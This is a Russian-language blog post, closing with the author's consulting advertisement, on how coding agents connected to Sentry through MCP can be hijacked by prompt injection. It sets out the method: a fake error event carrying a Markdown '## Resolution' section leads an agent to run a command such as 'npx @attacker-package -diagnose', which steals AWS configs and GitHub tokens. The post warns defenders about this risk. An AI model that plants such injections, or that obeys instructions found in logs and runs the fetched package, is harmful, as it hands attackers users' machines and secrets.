Твой AI-агент может выполнить приказ незнакомца через отчет в Sentry — атака срабатывает в 85% случаев. В погоне за «бесшовной интеграцией» через MCP мы создали конвейер доставки вредоноса прямо в терминал.
Конвейер доверия на максималках
Нам продают MCP как объединение всех данных в одном окне. Теперь твой Claude Code или Cursor может сам сходить в Sentry, забрать логи и предложить исправление. На деле это системный провал архитектуры доверия.
Проблема в том, что MCP создает слепой конвейер. Агент не делает различий между «инертными» данными (просто текстом ошибки) и «активными» инструкциями. Если MCP-сервер вернул текст, агент воспринимает его как авторитетный контекст. А поскольку Sentry DSN по дизайну публичны, любой желающий может отправить в твои логи что угодно.
Мы делегировали право запускать команды в терминале сущности, которая не умеет сомневаться в источнике данных.
Как работает цифровой гипноз
Схема простая. Чтобы взломать тебя, не нужно даже пытаться подобрать пароль — достаточно просто отправить сообщение в лог. Злоумышленнику даже не нужно взламывать твою компанию. Он просто находит публичный ключ Sentry в твоем JS-коде или на GitHub и отправляет туда фальшивое событие об ошибке.
Внутри этого события он прячет аккуратно оформленный Markdown с разделом ## Resolution. Когда ты просишь агента «исправить нерешенные ошибки», тот заходит в Sentry, видит этот раздел и принимает его за легитимную инструкцию по решению проблемы.
Агент послушно копирует команду из лога и запускает её у тебя на машине. Например, что-то вроде npx @attacker-package -diagnose. В этот момент ты даже не заметишь подвоха, потому что процесс выглядит как обычная работа умного помощника. Результат — полный захват системы и кража секретов из ~/.aws/config или GitHub-токенов.
Почему твои промпты не спасут
Многие думают, что достаточно добавить в системный промпт фразу «игнорируй недоверенные данные». Забудь. В реальности это не работает. Когда вредоносная инструкция приходит в формате, который имитирует системный шаблон Sentry, модель считает её частью инфраструктуры.
Самое неприятное, что такая атака проходит мимо стандартных защит. EDR и WAF бессильны, потому что все действия совершаются легитимным процессом — твоим AI-агентом, который работает с твоими правами пользователя.
Мы оказались в ситуации, где инструмент для повышения продуктивности стал идеальным троянским конём. Мы доверили агентам доступ к терминалу, но забыли научить их базовому правилу безопасности: никогда не доверяй внешнему вводу.
Иллюзия умного помощника
Мы привыкли называть этих ребят «агентами» и подразумеваем определенный уровень интеллекта. Но Agentjacking обнажает правду: перед нами просто продвинутые автодополнители, которые работают по принципу максимального соглашательства.
Человек, увидев в логе странную команду с непонятным пакетом из npm, скорее всего, задумается или хотя бы переспросит. AI-агент делает это мгновенно и без вопросов. Он не анализирует риск, он просто следует за паттерном «проблема — решение».
Пока индустрия гонится за «автономностью» агентов, мы создаем среду, где одна ошибка в модели доверия открывает дверь в систему тысячам компаний. И никакой «умный» чат-бот не заменит базовую гигиену: подтверждение каждой команды, которая лезет в твой терминал из внешнего мира.
Я разрабатываю и внедряю ИИ-агентов под бизнес-процессы с учетом безопасности — если нужно в свой бизнес, напишите в телеграм @dmitra_ai или ВКонтакте, обсудим.
Это похоже на очень лояльного пса, который впускает в дом любого грабителя, если тот одет в форму курьера и держит в руках коробку.